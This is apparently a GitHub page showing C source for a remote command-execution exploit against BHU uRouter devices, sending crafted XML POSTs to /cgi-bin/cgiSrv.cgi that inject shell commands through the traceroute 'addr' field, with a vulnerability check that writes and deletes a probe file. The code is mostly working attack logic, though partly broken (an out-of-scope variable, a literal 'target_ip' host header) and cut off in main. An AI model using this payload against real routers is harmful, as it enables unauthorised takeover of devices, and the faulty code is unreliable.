-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathBHU_uRouter_RCE.c
More file actions
112 lines (89 loc) · 3.85 KB
/
BHU_uRouter_RCE.c
File metadata and controls
112 lines (89 loc) · 3.85 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
// "BHU uRouter
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#define BUFFER_SIZE 4096
void send_request(int sock, const char *request) {
send(sock, request, strlen(request), 0);
}
int check_vulnerability(int sock) {
char buffer[BUFFER_SIZE];
const char *check_cmd = "<cmd><ITEM cmd=\"echo \\\"$USER\\\"\" addr=\"> /usr/share/www/routersploit.check\" /></cmd>";
const char *headers = "Content-Type: text/xml\r\nX-Requested-With: XMLHttpRequest\r\n";
// Создание запроса
char request[BUFFER_SIZE];
snprintf(request, sizeof(request),
"POST /cgi-bin/cgiSrv.cgi HTTP/1.1\r\n"
"Host: target_ip\r\n" // Замените на IP-адрес целевого устройства
"%s"
"Content-Length: %lu\r\n\r\n"
"%s",
headers, strlen(check_cmd), check_cmd);
// Отправка запроса
send_request(sock, request);
// Чтение ответа
recv(sock, buffer, sizeof(buffer) - 1, 0);
buffer[BUFFER_SIZE - 1] = '\0'; // Обеспечиваем нуль-терминатор
// Проверка на наличие "status=\"doing\""
if (strstr(buffer, "status=\"doing\"") == NULL) {
return 0; // Уязвимость не найдена
}
// Проверка на создание файла
char check_file[BUFFER_SIZE];
snprintf(check_file, sizeof(check_file), "GET /routersploit.check HTTP/1.1\r\nHost: target_ip\r\nConnection: close\r\n\r\n", target_ip);
send_request(sock, check_file);
recv(sock, buffer, sizeof(buffer) - 1, 0);
buffer[BUFFER_SIZE - 1] = '\0'; // Обеспечиваем нуль-терминатор
// Проверка на наличие "root" в ответе
if (strstr(buffer, "root") == NULL) {
return 0; // Уязвимость не найдена
}
// Удаление временного файла
const char *remove_cmd = "<cmd><ITEM cmd=\"rm -f /usr/share/www/routersploit.check\" /></cmd>";
snprintf(request, sizeof(request),
"POST /cgi-bin/cgiSrv.cgi HTTP/1.1\r\n"
"Host: target_ip\r\n" // Замените на IP-адрес целевого устройства
"%s"
"Content-Length: %lu\r\n\r\n"
"%s",
headers, strlen(remove_cmd), remove_cmd);
send_request(sock, request);
return 1; // Уязвимость найдена
}
void execute_command(int sock, const char *cmd) {
char buffer[BUFFER_SIZE];
const char *headers = "Content-Type: text/xml\r\nX-Requested-With: XMLHttpRequest\r\n";
// Формирование команды
char command[BUFFER_SIZE];
snprintf(command, sizeof(command),
"<cmd><ITEM cmd=\"traceroute\" addr=\"$(%s)\" /></cmd>", cmd);
// Создание запроса
char request[BUFFER_SIZE];
snprintf(request, sizeof(request),
"POST /cgi-bin/cgiSrv.cgi HTTP/1.1\r\n"
"Host: target_ip\r\n" // Замените на IP-адрес целевого устройства
"%s"
"Content-Length: %lu\r\n\r\n"
"%s",
headers, strlen(command), command);
// Отправка запроса
send_request(sock, request);
// Слепая RCE, поэтому нет ответа
}
int main(int argc, char *argv[]) {
if (argc != 3) {
fprintf(stderr, "Usage: %s <target_ip> <port>\n", argv[0]);
return EXIT_FAILURE;
}
const char *target_ip = argv[1];
int port = atoi(argv[2]);
int sock;
struct sockaddr_in server_addr;
// Создание сокета
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
perror("Socket creation failed");
return EXIT_FAILURE;
}